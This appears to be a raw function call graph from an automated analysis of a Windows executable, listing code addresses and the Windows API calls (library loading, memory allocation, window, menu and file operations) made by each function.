4 API calls 55908->55912 55911 4489df 55910->55911 55911->55889 55913 44897c 55912->55913 55914 4037b8 4 API calls 55913->55914 55914->55905 55916 403494 4 API calls 55915->55916 55917 448562 55916->55917 55918 4037b8 4 API calls 55917->55918 55919 448574 55918->55919 55920 403778 4 API calls 55919->55920 55921 448595 55920->55921 55922 4037b8 4 API calls 55921->55922 55923 4485ad 55922->55923 55924 403778 4 API calls 55923->55924 55925 4485d8 55924->55925 55926 4037b8 4 API calls 55925->55926 55935 4485f0 55926->55935 55927 448628 55929 403420 4 API calls 55927->55929 55928 4486c3 55933 4486cb GetProcAddress 55928->55933 55930 448708 55929->55930 55930->55907 55931 44864b LoadLibraryExA 55931->55935 55932 44865d LoadLibraryA 55932->55935 55934 4486de 55933->55934 55934->55927 55935->55927 55935->55928 55935->55931 55935->55932 55936 403b80 4 API calls 55935->55936 55937 403450 4 API calls 55935->55937 55939 43da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55935->55939 55936->55935 55937->55935 55939->55935 50217 402584 50218 402598 50217->50218 50219 4025ab 50217->50219 50247 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50218->50247 50221 4025c2 RtlEnterCriticalSection 50219->50221 50222 4025cc 50219->50222 50221->50222 50233 4023b4 13 API calls 50222->50233 50223 40259d 50223->50219 50225 4025a1 50223->50225 50226 4025d5 50227 4025d9 50226->50227 50234 402088 50226->50234 50229 402635 50227->50229 50230 40262b RtlLeaveCriticalSection 50227->50230 50230->50229 50231 4025e5 50231->50227 50248 402210 9 API calls 50231->50248 50233->50226 50235 40209c 50234->50235 50236 4020af 50234->50236 50255 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50235->50255 50238 4020c6 RtlEnterCriticalSection 50236->50238 50241 4020d0 50236->50241 50238->50241 50239 4020a1 50239->50236 50240 4020a5 50239->50240 50242 402106 50240->50242 50241->50242 50249 401f94 50241->50249 50242->50231 50245 4021f1 RtlLeaveCriticalSection 50246 4021fb 50245->50246 50246->50231 50247->50223 50248->50227 50250 401fa4 50249->50250 50251 401fd0 50250->50251 50254 401ff4 50250->50254 50256 401f0c 50250->50256 50251->50254 50261 401db4 50251->50261 50254->50245 50254->50246 50255->50239 50265 40178c 50256->50265 50259 401f29 50259->50250 50262 401e02 50261->50262 50263 401dd2 50261->50263 50262->50263 50293 401d1c 50262->50293 50263->50254 50268 4017a8 50265->50268 50267 4017b2 50284 401678 VirtualAlloc 50267->50284 50268->50267 50270 40180f 50268->50270 50272 401803 50268->50272 50276 4014e4 50268->50276 50285 4013e0 LocalAlloc 50268->50285 50270->50259 50275 401e80 9 API calls 50270->50275 50286 4015c0 VirtualFree 50272->50286 50273 4017be 50273->50270 50275->50259 50277 4014f3 VirtualAlloc 50276->50277 50279 401520 50277->50279 50280 401543 50277->50280 50287 401398 50279->50287 50280->50268 50283 401530 VirtualFree 50283->50280 50284->50273 50285->50268 50286->50270 50290 401340 50287->50290 50291 40134c LocalAlloc 50290->50291 50292 40135e 50290->50292 50291->50292 50292->50280 50292->50283 50294 401d2e 50293->50294 50295 401d51 50294->50295 50296 401d63 50294->50296 50306 401940 50295->50306 50298 401940 3 API calls 50296->50298 50299 401d61 50298->50299 50300 401d79 50299->50300 50316 401bf8 9 API calls 50299->50316 50300->50263 50302 401d88 50303 401da2 50302->50303 50317 401c4c 9 API calls 50302->50317 50318 401454 LocalAlloc 50303->50318 50307 401966 50306->50307 50315 4019bf 50306->50315 50319 40170c 50307->50319 50311 401983 50312 40199a 50311->50312 50324 4015c0 VirtualFree 50311->50324 50312->50315 50325 401454 LocalAlloc 50312->50325 50315->50299 50316->50302 50317->50303 50318->50300 50320 401743 50319->50320 50321 401783 50320->50321 50322 40175d VirtualFree 50320->50322 50323 4013e0 LocalAlloc 50321->50323 50322->50320 50323->50311 50324->50312 50325->50315 50326 416644 50327 416651 50326->50327 50328 4166ab 50326->50328 50333 416550 CreateWindowExA 50327->50333 50329 416658 SetPropA SetPropA 50329->50328 50330 41668b 50329->50330 50331 41669e SetWindowPos 50330->50331 50331->50328 50333->50329 55940 4222e4 55941 4222f3 55940->55941 55946 421274 55941->55946 55944 422313 55947 4212e3 55946->55947 55960 421283 55946->55960 55950 4212f4 55947->55950 55971 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55947->55971 55949 421322 55952 421395 55949->55952 55957 42133d 55949->55957 55950->55949 55951 4213ba 55950->55951 55954 4213ce SetMenu 55951->55954 55968 421393 55951->55968 55959 4213a9 55952->55959 55952->55968 55953 4213e6 55974 4211bc 10 API calls 55953->55974 55954->55968 55963 421360 GetMenu 55957->55963 55957->55968 55958 4213ed 55958->55944 55969 4221e8 10 API calls 55958->55969 55962 4213b2 SetMenu 55959->55962 55960->55947 55970 408d2c 19 API calls 55960->55970 55962->55968 55964 421383 55963->55964 55965 42136a 55963->55965 55972 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55964->55972 55967 42137d SetMenu 55965->55967 55967->55964 55968->55953 55973 421e2c 11 API calls 55968->55973 55969->55944 55970->55960 55971->55950 55972->55968 55973->55953 55974->55958 55975 44b4a8 55976 44b4b6 55975->55976 55978 44b4d5 55975->55978 55977 44b38c 11 API calls 55976->55977 55976->55978 55977->55978 55979 448728 55980 448756 55979->55980 55981 44875d 55979->55981 55983 403400 4 API calls 55980->55983 55982 448771 55981->55982 55984 44852c 7 API calls 55981->55984 55982->55980 55985 403494 4 API calls 55982->55985 55986 448907 55983->55986 55984->55982 55987 44878a 55985->55987 55988 4037b8 4 API calls 55987->55988 55989 4487a6 55988->55989 55990 4037b8 4 API calls 55989->55990 55991 4487c2 55990->55991 55991->55980 55992 4487d6 55991->55992 55993 4037b8 4 API calls 55992->55993 55994 4487f0 55993->55994 55995 431bd0 4 API calls 55994->55995 55996 448812 55995->55996 55997 431ca0 4 API calls 55996->55997 56004 448832 55996->56004 55997->55996 55998 448888 56011 442334 55998->56011 55999 448870 55999->55998 56023 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55999->56023 56003 4488bc GetLastError 56024 4484c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56003->56024 56004->55999 56022 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56004->56022 56006 4488cb 56025 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56006->56025 56008 4488e0 56026 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56008->56026 56010 4488e8 56012 443312 56011->56012 56013 44236d 56011->56013 56015 403400 4 API calls 56012->56015 56014 403400 4 API calls 56013->56014 56016 442375 56014->56016 56017 443327 56015->56017 56018 431bd0 4 API calls 56016->56018 56017->56003 56019 442381 56018->56019 56020 443302 56019->56020 56027 441a0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56019->56027 56020->56003 56022->56004 56023->55998 56024->56006 56025->56008 56026->56010 56027->56019 56028 4165ec DestroyWindow 56029 42e3ef SetErrorMode 50334 441394 50335 44139d 50334->50335 50336 4413ab WriteFile 50334->50336 50335->50336 50337 4413b6 50336->50337 56030 491bf8 56031 491c32 56030->56031 56032 491c34 56031->56032 56035 491c3e 56031->56035 56226 409098 MessageBeep 56032->56226 56034 491c39 56038 403420 4 API calls 56034->56038 56036 491c4d 56035->56036 56037 491c76 56035->56037 56039 446ff8 18 API calls 56036->56039 56042 491cae 56037->56042 56043 491c85 56037->56043 56040 49228a 56038->56040 56041 491c5a 56039->56041 56044 403400 4 API calls 56040->56044 56227 406bb0 56041->56227 56052 491cbd 56042->56052 56053 491ce6 56042->56053 56046 446ff8 18 API calls 56043->56046 56047 492292 56044->56047 56049 491c92 56046->56049 56235 406c00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56049->56235 56055 446ff8 18 API calls 56052->56055 56059 491d0e 56053->56059 56060 491cf5 56053->56060 56054 491c9d 56236 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56054->56236 56057 491cca 56055->56057 56237 406c34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56057->56237 56066 491d1d 56059->56066 56067 491d42 56059->56067 56239 407280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 56060->56239 56061 491cd5 56238 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56061->56238 56064 491cfd 56240 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56064->56240 56068 446ff8 18 API calls 56066->56068 56071 491d7a 56067->56071 56072 491d51 56067->56072 56069 491d2a 56068->56069 56070 4072a8 SetCurrentDirectoryA 56069->56070 56073 491d32 56070->56073 56077 491d89 56071->56077 56078 491db2 56071->56078 56074 446ff8 18 API calls 56072->56074 56241 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56073->56241 56076 491d5e 56074->56076 56079 42c804 5 API calls 56076->56079 56080 446ff8 18 API calls 56077->56080 56085 491dfe 56078->56085 56086 491dc1 56078->56086 56081 491d69 56079->56081 56082 491d96 56080->56082 56242 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56081->56242 56243 4071f8 8 API calls 56082->56243 56092 491e0d 56085->56092 56093 491e36 56085->56093 56088 446ff8 18 API calls 56086->56088 56087 491da1 56244 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56087->56244 56090 491dd0 56088->56090 56091 446ff8 18 API calls 56090->56091 56094 491de1 56091->56094 56095 446ff8 18 API calls 56092->56095 56099 491e6e 56093->56099 56100 491e45 56093->56100 56245 4918fc 8 API calls 56094->56245 56097 491e1a 56095->56097 56101 42c8a4 5 API calls 56097->56101 56098 491ded 56246 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56098->56246 56108 491e7d 56099->56108 56109 491ea6 56099->56109 56103 446ff8 18 API calls 56100->56103 56104 491e25 56101->56104 56105 491e52 56103->56105 56247 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56104->56247 56107 42c8cc 5 API calls 56105->56107 56110 491e5d 56107->56110 56111 446ff8 18 API calls 56108->56111 56115 491ede 56109->56115 56116 491eb5 56109->56116 56248 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56110->56248 56113 491e8a 56111->56113 56249 42c8fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56113->56249 56121 491eed 56115->56121 56122 491f16 56115->56122 56118 446ff8 18 API calls 56116->56118 56117 491e95 56250 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56117->56250 56120 491ec2 56118->56120 56123 42c92c 5 API calls 56120->56123 56124 446ff8 18 API calls 56121->56124 56129 491f62 56122->56129 56130 491f25 56122->56130 56125 491ecd 56123->56125 56126 491efa 56124->56126 56251 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56125->56251 56128 42c954 5 API calls 56126->56128 56131 491f05 56128->56131 56135 491f71 56129->56135 56136 491fb4 56129->56136 56132 446ff8 18 API calls 56130->56132 56252 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56131->56252 56134 491f34 56132->56134 56137 446ff8 18 API calls 56134->56137 56138 446ff8 18 API calls 56135->56138 56143 491fc3 56136->56143 56144 492027 56136->56144 56139 491f45 56137->56139 56141 491f84 56138->56141 56253 42c4f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56139->56253 56145 446ff8 18 API calls 56141->56145 56142 491f51 56254 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56142->56254 56147 446ff8 18 API calls 56143->56147 56151 492066 56144->56151 56152 492036 56144->56152 56148 491f95 56145->56148 56149 491fd0 56147->56149 56255 491af4 12 API calls 56148->56255 56218 42c608 7 API calls 56149->56218 56164 4920a5 56151->56164 56165 492075 56151->56165 56155 446ff8 18 API calls 56152->56155 56154 491fa3 56256 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56154->56256 56158 492043 56155->56158 56156 491fde 56159 491fe2 56156->56159 56160 492017 56156->56160 56259 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56158->56259 56163 446ff8 18 API calls 56159->56163 56258 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56160->56258 56168 491ff1 56163->56168 56173 4920e4 56164->56173 56174 4920b4 56164->56174 56166 446ff8 18 API calls 56165->56166 56169 492082 56166->56169 56167 492050 56260 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56167->56260 56219 452c80 56168->56219 56172 452770 5 API calls 56169->56172 56177 49208f 56172->56177 56182 49212c 56173->56182 56183 4920f3 56173->56183 56178 446ff8 18 API calls 56174->56178 56175 492061 56175->56034 56176 492001 56257 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56176->56257 56261 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56177->56261 56181 4920c1 56178->56181 56262 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56181->56262 56190 49213b 56182->56190 56191 492174 56182->56191 56185 446ff8 18 API calls 56183->56185 56187 492102 56185->56187 56186 4920ce 56263 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56186->56263 56189 446ff8 18 API calls 56187->56189 56193 492113 56189->56193 56192 446ff8 18 API calls 56190->56192 56196 492187 56191->56196 56202 49223d 56191->56202 56194 49214a 56192->56194 56198 447278 5 API calls 56193->56198 56195 446ff8 18 API calls 56194->56195 56197 49215b 56195->56197 56199 446ff8 18 API calls 56196->56199 56204 447278 5 API calls 56197->56204 56198->56034 56200 4921b4 56199->56200 56201 446ff8 18 API calls 56200->56201 56205 4921cb 56201->56205 56202->56034 56267 446f9c 18 API calls 56202->56267 56204->56034 56264 407ddc 7 API calls 56205->56264 56206 492256 56207 42e8c8 5 API calls 56206->56207 56208 49225e 56207->56208 56268 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56208->56268 56211 4921ed 56212 446ff8 18 API calls 56211->56212 56213 492201 56212->56213 56265 408508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56213->56265 56215 49220c 56266 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56215->56266 56217 492218 56218->56156 56220 452724 2 API calls 56219->56220 56221 452c99 56220->56221 56222 452c9d 56221->56222 56223 452cc1 MoveFileA GetLastError 56221->56223 56222->56176 56224 452760 Wow64RevertWow64FsRedirection 56223->56224 56225 452ce7 56224->56225 56225->56176 56226->56034 56228 406bbf 56227->56228 56229 406be1 56228->56229 56230 406bd8 56228->56230 56232 403778 4 API calls 56229->56232 56231 403400 4 API calls 56230->56231 56233 406bdf 56231->56233 56232->56233 56234 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56233->56234 56234->56034 56235->56054 56236->56034 56237->56061 56238->56034 56239->56064 56240->56034 56241->56034 56242->56034 56243->56087 56244->56034 56245->56098 56246->56034 56247->56034 56248->56034 56249->56117 56250->56034 56251->56034 56252->56034 56253->56142 56254->56034 56255->56154 56256->56034 56257->56034 56258->56034 56259->56167 56260->56175 56261->56034 56262->56186 56263->56034 56264->56211 56265->56215 56266->56217 56267->56206 56268->56034 56269 40cc34 56272 406f10 WriteFile 56269->56272 56273 406f2d 56272->56273 50338 48095d 50343 451004 50338->50343 50340 480971 50353 47fa0c 50340->50353 50342 480995 50344 451011 50343->50344 50346 451065 50344->50346 50362 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50344->50362 50359 450e88 50346->50359 50350 45108d 50351 4510d0 50350->50351 50364 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50350->50364 50351->50340 50369 40b3c8 50353->50369 50355 47fa79 50355->50342 50358 47fa2e 50358->50355 50373 4069dc 50358->50373 50376 476994 50358->50376 50365 450e34 50359->50365 50362->50346 50363 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50363->50350 50364->50351 50366 450e57 50365->50366 50367 450e46 50365->50367 50366->50350 50366->50363 50368 450e4b InterlockedExchange 50367->50368 50368->50366 50370 40b3d3 50369->50370 50372 40b3f3 50370->50372 50392 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50370->50392 50372->50358 50374 402648 4 API calls 50373->50374 50375 4069e7 50374->50375 50375->50358 50384 4769c5 50376->50384 50390 476a0e 50376->50390 50377 476a59 50393 451294 50377->50393 50378 451294 21 API calls 50378->50390 50381 476a70 50383 403420 4 API calls 50381->50383 50382 4038a4 4 API calls 50382->50390 50385 476a8a 50383->50385 50384->50390 50391 451294 21 API calls 50384->50391 50399 4038a4 50384->50399 50408 403744 50384->50408 50412 403450 50384->50412 50385->50358 50388 403744 4 API calls 50388->50390 50389 403450 4 API calls 50389->50390 50390->50377 50390->50378 50390->50382 50390->50388 50390->50389 50391->50384 50392->50372 50394 4512a4 50393->50394 50395 4512af 50393->50395 50394->50381 50418 451238 21 API calls 50395->50418 50397 4512ba 50397->50394 50419 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50397->50419 50400 4038b1 50399->50400 50407 4038e1 50399->50407 50402 4038da 50400->50402 50405 4038bd 50400->50405 50401 403400 4 API calls 50404 4038cb 50401->50404 50403 4034bc 4 API calls 50402->50403 50403->50407 50404->50384 50420 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50405->50420 50407->50401 50409 40374a 50408->50409 50411 40375b 50408->50411 50410 4034bc 4 API calls 50409->50410 50409->50411 50410->50411 50411->50384 50414 403454 50412->50414 50416 403464 50412->50416 50413 403490 50413->50384 50415 4034bc 4 API calls 50414->50415 50414->50416 50415->50416 50416->50413 50417 402660 4 API calls 50416->50417 50417->50413 50418->50397 50419->50394 50420->50404 50421 41ee54 50422 41ee63 IsWindowVisible 50421->50422 50423 41ee99 50421->50423 50422->50423 50424 41ee6d IsWindowEnabled 50422->50424 50424->50423 50425 41ee77 50424->50425 50426 402648 4 API calls 50425->50426 50427 41ee81 EnableWindow 50426->50427 50427->50423 50428 46bb10 50429 46bb44 50428->50429 50461 46bfad 50428->50461 50431 46bb80 50429->50431 50434 46bbdc 50429->50434 50435 46bbba 50429->50435 50436 46bbcb 50429->50436 50437 46bb98 50429->50437 50438 46bba9 50429->50438 50430 403400 4 API calls 50433 46bfec 50430->50433 50431->50461 50519 468c74 50431->50519 50439 403400 4 API calls 50433->50439 50751 46baa0 45 API calls 50434->50751 50484 46b6d0 50435->50484 50750 46b890 67 API calls 50436->50750 50748 46b420 47 API calls 50437->50748 50749 46b588 42 API calls 50438->50749 50445 46bff4 50439->50445 50446 46bb9e 50446->50431 50446->50461 50447 46bc5b 50451 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50447->50451 50452 46bd7e 50447->50452 50455 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50447->50455 50456 42cbc0 6 API calls 50447->50456 50458 46af68 23 API calls 50447->50458 50447->50461 50462 46bdd7 50447->50462 50480 46be9f 50447->50480 50522 468bb0 50447->50522 50530 46acd4 50447->50530 50675 483084 50447->50675 50788 46b1dc 19 API calls 50447->50788 50448 46bc18 50448->50447 50448->50461 50752 494da0 50448->50752 50451->50447 50771 48358c 123 API calls 50452->50771 50455->50447 50456->50447 50457 46bd99 50457->50461 50458->50447 50461->50430 50537 469f1c 50462->50537 50463 46af68 23 API calls 50463->50461 50465 46be3d 50466 403450 4 API calls 50465->50466 50467 46be4d 50466->50467 50468 46bea9 50467->50468 50469 46be59 50467->50469 50474 46bf6b 50468->50474 50598 46af68 50468->50598 50772 457f1c 50469->50772 50473 457f1c 24 API calls 50473->50480 50480->50463 50789 46c424 50484->50789 50487 46b852 50488 403420 4 API calls 50487->50488 50490 46b86c 50488->50490 50492 403400 4 API calls 50490->50492 50491 46b71e 50518 46b83e 50491->50518 50796 455f84 13 API calls 50491->50796 50494 46b874 50492->50494 50493 403450 4 API calls 50493->50487 50496 403400 4 API calls 50494->50496 50497 46b87c 50496->50497 50497->50431 50498 46b801 50498->50487 50504 42cd48 7 API calls 50498->50504 50498->50518 50501 46b73c 50502 46b7a1 50501->50502 50797 466600 50501->50797 50502->50487 50502->50498 50806 42cd48 50502->50806 50507 46b817 50504->50507 50512 451458 4 API calls 50507->50512 50507->50518 50509 466600 19 API calls 50511 46b77c 50509->50511 50514 46b82e 50512->50514 50813 47efd0 42 API calls 50514->50813 50518->50487 50518->50493 50520 468bb0 19 API calls 50519->50520 50521 468c83 50520->50521 50521->50448 50526 468bdf 50522->50526 50523 4078f4 19 API calls 50524 468c18 50523->50524 51066 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50524->51066 50526->50523 50527 468c20 50526->50527 50528 403400 4 API calls 50527->50528 50529 468c38 50528->50529 50529->50447 50531 46ace5 50530->50531 50532 46ace0 50530->50532 51152 469a80 46 API calls 50531->51152 50533 46ace3 50532->50533 51067 46a740 50532->51067 50533->50447 50535 46aced 50535->50447 50538 403400 4 API calls 50537->50538 50539 469f4a 50538->50539 51529 47dd00 50539->51529 50541 469fad 50542 469fb1 50541->50542 50543 469fca 50541->50543 51536 466800 50542->51536 50545 469fbb 50543->50545 51539 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50543->51539 50546 46a25e 50545->50546 50548 46a154 50545->50548 50549 46a0e9 50545->50549 50550 403420 4 API calls 50546->50550 50554 403494 4 API calls 50548->50554 50553 403494 4 API calls 50549->50553 50555 46a288 50550->50555 50551 469fe6 50551->50545 50552 469fee 50551->50552 50556 46af68 23 API calls 50552->50556 50557 46a0f6 50553->50557 50558 46a161 50554->50558 50555->50465 50565 469ffb 50556->50565 50559 40357c 4 API calls 50557->50559 50560 40357c 4 API calls 50558->50560 50561 46a103 50559->50561 50562 46a16e 50560->50562 50563 40357c 4 API calls 50561->50563 50564 40357c 4 API calls 50562->50564 50566 46a110 50563->50566 50567 46a17b 50564->50567 50570 46a024 SetActiveWindow 50565->50570 50571 46a03c 50565->50571 50568 40357c 4 API calls 50566->50568 50569 40357c 4 API calls 50567->50569 50572 46a11d 50568->50572 50573 46a188 50569->50573 50570->50571 51540 42f560 50571->51540 50575 466800 20 API calls 50572->50575 50574 40357c 4 API calls 50573->50574 50577 46a196 50574->50577 50576 46a12b 50575->50576 50578 40357c 4 API calls 50576->50578 50579 414b18 4 API calls 50577->50579 50581 46a134 50578->50581 50582 46a152 50579->50582 50584 40357c 4 API calls 50581->50584 51557 466b38 50582->51557 50587 46a141 50584->50587 50589 414b18 4 API calls 50587->50589 50588 46a08d 50590 46ade4 21 API calls 50588->50590 50589->50582 50591 46a0bf 50590->50591 50591->50465 50599 468c74 19 API calls 50598->50599 50600 46af80 50599->50600 50601 46afa2 50600->50601 50602 4652cc 7 API calls 50600->50602 51753 4652cc 50601->51753 50602->50601 50606 46afba 50607 46ade4 21 API calls 50606->50607 50608 46aff2 50607->50608 50609 414b18 4 API calls 50608->50609 50610 46b006 50609->50610 50611 46b012 50610->50611 50612 46b03c 50610->50612 50613 414b18 4 API calls 50611->50613 50614 46b05b 50612->50614 50615 46b085 50612->50615 50616 46b026 50613->50616 50617 414b18 4 API calls 50614->50617 50618 414b18 4 API calls 50615->50618 50619 414b18 4 API calls 50616->50619 50620 46b06f 50617->50620 50621 46b099 50618->50621 50622 46b03a 50619->50622 50623 414b18 4 API calls 50620->50623 50624 414b18 4 API calls 50621->50624 50623->50622 50624->50622 50676 46c424 48 API calls 50675->50676 50677 4830c7 50676->50677 50678 4830d0 50677->50678 52040 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50677->52040 50680 414ae8 4 API calls 50678->50680 50681 4830e0 50680->50681 50682 403450 4 API calls 50681->50682 50683 4830ed 50682->50683 51842 46c77c 50683->51842 50686 4830fd 50688 414ae8 4 API calls 50686->50688 50689 48310d 50688->50689 50690 403450 4 API calls 50689->50690 50691 48311a 50690->50691 50692 469868 SendMessageA 50691->50692 50693 483133 50692->50693 50694 483184 50693->50694 52042 479e18 23 API calls 50693->52042 51871 4241dc IsIconic 50694->51871 50698 48319f SetActiveWindow 50699 4831b4 50698->50699 51879 4824b4 50699->51879 50748->50446 50749->50431 50750->50431 50751->50431 53703 43d9c8 50752->53703 50755 494dcc 53708 431bd0 50755->53708 50756 494e52 50757 494e61 50756->50757 53741 4945c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50756->53741 50757->50447 50766 494e16 53739 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50766->53739 50768 494e2a 53740 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50768->53740 50770 494e4a 50770->50447 50771->50457 50773 457f41 50772->50773 50774 457f61 50773->50774 50775 4078f4 19 API calls 50773->50775 50777 403400 4 API calls 50774->50777 50776 457f59 50775->50776 50778 457d10 24 API calls 50776->50778 50779 457f76 50777->50779 50778->50774 50779->50473 50788->50447 50814 46c4bc 50789->50814 50792 414ae8 50793 414af6 50792->50793 50794 4034e0 4 API calls 50793->50794 50795 414b03 50794->50795 50795->50491 50796->50501 50798 46661a 50797->50798 51017 4078f4 50798->51017 51060 42cccc 50806->51060 50809 451458 50810 451428 4 API calls 50809->50810 50811 451474 50810->50811 50812 47efd0 42 API calls 50811->50812 50812->50498 50813->50518 50815 414ae8 4 API calls 50814->50815 50816 46c4f0 50815->50816 50875 466898 50816->50875 50820 46c502 50821 46c511 50820->50821 50825 46c52a 50820->50825 50944 47efd0 42 API calls 50821->50944 50823 403420 4 API calls 50824 46b702 50823->50824 50824->50487 50824->50792 50826 46c571 50825->50826 50827 46c558 50825->50827 50828 46c5d6 50826->50828 50841 46c575 50826->50841 50945 47efd0 42 API calls 50827->50945 50947 42cb4c CharNextA 50828->50947 50831 46c5e5 50832 46c5e9 50831->50832 50836 46c602 50831->50836 50948 47efd0 42 API calls 50832->50948 50834 46c5bd 50946 47efd0 42 API calls 50834->50946 50835 46c626 50949 47efd0 42 API calls 50835->50949 50836->50835 50889 466a08 50836->50889 50841->50834 50841->50836 50844 46c63f 50897 403778 50844->50897 50849 46c666 50950 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50849->50950 50850 46c697 50908 42c8cc 50850->50908 50853 46c679 50856 451458 4 API calls 50853->50856 50858 46c686 50856->50858 50951 47efd0 42 API calls 50858->50951 50862 46c525 50862->50823 50876 4668b2 50875->50876 50878 42cbc0 6 API calls 50876->50878 50879 403450 4 API calls 50876->50879 50880 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50876->50880 50881 4668fb 50876->50881 50954 42caac 50876->50954 50878->50876 50879->50876 50880->50876 50882 403420 4 API calls 50881->50882 50883 466915 50882->50883 50884 414b18 50883->50884 50885 414ae8 4 API calls 50884->50885 50886 414b3c 50885->50886 50887 403400 4 API calls 50886->50887 50888 414b6d 50887->50888 50888->50820 50890 466a12 50889->50890 50891 466a25 50890->50891 50970 42cb3c CharNextA 50890->50970 50891->50835 50893 466a38 50891->50893 50895 466a42 50893->50895 50894 466a6f 50894->50835 50894->50844 50895->50894 50971 42cb3c CharNextA 50895->50971 50898 4037aa 50897->50898 50900 40377d 50897->50900 50899 403400 4 API calls 50898->50899 50901 4037a0 50899->50901 50900->50898 50902 403791 50900->50902 50904 42c99c 50901->50904 50903 4034e0 4 API calls 50902->50903 50903->50901 50905 42c9f5 50904->50905 50906 42c9b2 50904->50906 50905->50849 50905->50850 50906->50905 50972 42cb3c CharNextA 50906->50972 50973 42c674 50908->50973 50944->50862 50945->50862 50946->50862 50947->50831 50948->50862 50949->50862 50950->50853 50951->50862 50955 403494 4 API calls 50954->50955 50956 42cabc 50955->50956 50957 403744 4 API calls 50956->50957 50961 42caf2 50956->50961 50963 42c444 IsDBCSLeadByte 50956->50963 50957->50956 50959 42cb36 50959->50876 50961->50959 50964 4037b8 50961->50964 50969 42c444 IsDBCSLeadByte 50961->50969 50963->50956 50965 403744 4 API calls 50964->50965 50966 4037c6 50965->50966 50967 4037fc 50966->50967 50968 4038a4 4 API calls 50966->50968 50967->50961 50968->50967 50969->50961 50970->50890 50971->50895 50972->50906 50976 42c67c 50973->50976 50975 42c67b 50979 42c68d 50976->50979 50977 42c6f1 50980 42c6ec 50977->50980 50984 42c444 IsDBCSLeadByte 50977->50984 50979->50977 50982 42c6ab 50979->50982 50980->50975 50982->50980 50983 42c444 IsDBCSLeadByte 50982->50983 50983->50982 50984->50980 51020 407908 51017->51020 51021 407925 51020->51021 51028 4075b8 51021->51028 51024 407951 51026 4034e0 4 API calls 51024->51026 51027 407903 51026->51027 51027->50509 51031 4075d3 51028->51031 51029 4075e5 51029->51024 51033 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51029->51033 51031->51029 51034 4076da 19 API calls 51031->51034 51035 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51031->51035 51033->51024 51034->51031 51035->51031 51061 42cbc0 6 API calls 51060->51061 51062 42ccee 51061->51062 51063 42ccf6 GetFileAttributesA 51062->51063 51064 403400 4 API calls 51063->51064 51065 42cd13 51064->51065 51065->50498 51065->50809 51066->50527 51069 46a787 51067->51069 51068 46abff 51071 46ac1a 51068->51071 51072 46ac4b 51068->51072 51069->51068 51070 46a842 51069->51070 51075 403494 4 API calls 51069->51075 51074 46a863 51070->51074 51078 46a8a4 51070->51078 51076 403494 4 API calls 51071->51076 51073 403494 4 API calls 51072->51073 51077 46ac59 51073->51077 51079 403494 4 API calls 51074->51079 51080 46a7c6 51075->51080 51081 